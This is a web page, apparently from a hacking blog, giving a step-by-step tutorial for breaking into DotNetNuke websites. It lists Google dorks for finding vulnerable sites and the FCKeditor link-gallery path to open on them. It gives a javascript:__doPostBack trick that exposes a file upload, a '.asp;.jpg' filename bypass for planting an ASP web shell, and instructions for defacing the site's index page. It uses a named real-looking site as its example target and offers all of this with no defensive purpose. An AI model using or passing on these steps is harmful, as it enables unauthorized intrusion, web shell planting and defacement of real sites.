DNN Hacking Tutorial

Let's Get Started:
Step 1: First you have to download This ASP Shell


Step 2: Now Open  http://www.google.com and enter this dork (This Dork is for Finding DNN vulnerable sites)



DNN Dorks:


inurl:/tabid/36/language/en-US/Default.aspx
OR
inurl:/Fck/fcklinkgallery.aspx






Step 3: It will show you many sites, Copy any one of site.


Step 4: Example

For example take this site.
http://www.itservicespro.net


Step 5: Now Paste this after the site url:

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


So the site Link will look like this :

http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


Note:  if it will show you like this (see screenshot below) its mean site could not hack find another site   





Now Click on File ( A File On Your Site )


Step 8: Now rplace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')


Note: This Script will Only Work In Google Chrome



Step 9: You will Find the Upload Option 
                                                                  
Step 10: Select Root


Step 11: Upload your ASP shell.



After Uploading

Go for your shell  www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/kingofhacker.asp;.jpg
So you upload shell and now the shell is in front of you look like this (screenshot below)
Click on...  again and again till you will see admin


So when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\

and upload your deface index page so
this is your result www.site.com/urpagename.html



If  you want to deface main page then click on Admin dir and search for index htm or html or php and click on Edit and copy your deface page code and replace.


Now You can Upload Php Shell If you want to it will give more option to work with

Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity